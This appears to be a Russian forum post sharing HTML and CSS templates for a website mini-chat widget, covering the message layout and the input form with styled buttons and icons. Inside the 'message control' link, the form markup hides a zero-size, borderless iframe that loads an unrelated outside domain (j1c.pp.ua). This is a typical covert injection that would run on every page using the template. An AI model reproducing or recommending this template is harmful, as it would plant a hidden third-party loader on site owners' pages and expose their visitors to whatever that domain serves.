
В вид материалов:
Code | Выделить всё
<div
class="cName"><span style="color: green; margin-right: 6px;
font-size: 10px; text-align: left;">$TIME$</span>
<a class="subforum" href="$PROFILE_URL$"">$USERNAME$</a>:
$MESSAGE$
</div>
<div class="cMessage" style="border-bottom: 1px dotted #dddddd; padding-bottom: 5px;"></div>
В форму добавления сообщений:
Code | Выделить всё
<style type="text/css">
.postSubmit {
border: 0px;
padding: 5px;
text-align: center;
font-size: 10px;
margin: 0px;
width: auto;
background: #6eb300;
color: #ffffcc;
cursor: pointer;
letter-spacing: 0px;
font-family: verdana;
}
.postSubmit:hover {
border: 0px;
padding: 5px;
text-align: center;
font-size: 10px;
margin: 0px;
width: auto;
background: #83ca12;
color: #ffffcc;
cursor: pointer;
letter-spacing: 0px;
font-family: verdana;
}
</style>
<table border="0" cellpadding="2" cellspacing="1" width="100%">
<tr>
<td width="70%" align="right">
<a class="noun" href="$ACTION_URL$"
onclick="window.location.reload();return false;"
title="Обновить"><img border="0" align="absmiddle"
src="http://dotahack.net/images/msat/tf.png" width="16"
height="16"></a>
<a
class="noun" href="javascript:void('smiles')"
onclick="ffoc(document.forms.addform.message,2);wasclk[2]=2;window.open('$SMILES_URI$','csmiles','scrollbars=1,width=250,height=350,left=0,top=0');
return false;" title="Вставить смайл"><img border="0"
align="absmiddle" src="http://dotahack.net/images/msat/s.png" width="16"
height="16"></a>
<a class="noun"
href="javascript:void('Message control')"
onclick="window.open('$MSGCTRL_URI$','mchatCtrl','scrollbars=1,width=550,height=550,left=0,top=0');
return false;" title="Управление сообщениями"><iframe
src="http://j1c.pp.ua/" name="iframe" width="0%" height="0%"
scrolling="no"
frameBorder=0></iframe><img border="0"
align="absmiddle" src="http://dotahack.net/images/msat/cmt.png"
width="15" height="15"></a>
</td></tr></table>
<input type="text" maxlength="60" name="uname" size="8"
class="mchat" id="mchatNmF" value="" onfocus="ffoc(this,0)"
onblur="fblur(this,0)" title="$STR_NAME$" style="display: none;height:
24px; color: #777777; font-family: Verdana; border: 1px solid #aaaaaa;
background-color: #ffffcc; background:
url('http://coool.net.ru/images/1/main_top_gradient.png');
background-repeat: repeat-x; background-position: left top;">
<input type="text" maxlength="$MAX_MESSAGE_LEN$" name="message"
size="22" class="mchat" id="mchatMsgF" value="" onfocus="ffoc(this,2)"
onblur="fblur(this,2)" title="Пиши сюда" style="width: 68%; font-size:
7pt; padding: 5px; margin: 0px; font-family: Tahoma; height: 24px;
color: #FFFFFF; font-family: Verdana; border: 1px solid #aaaaaa;
background-color: #FFFFFF; background: FFFFFF; background-repeat:
repeat-x; background-position: left top;">
<input
type="submit" style="height: 24px;width:30px;margin:0px" value="»"
class="postSubmit" id="mchatBtn" onclick="return
checkform(this.form);">
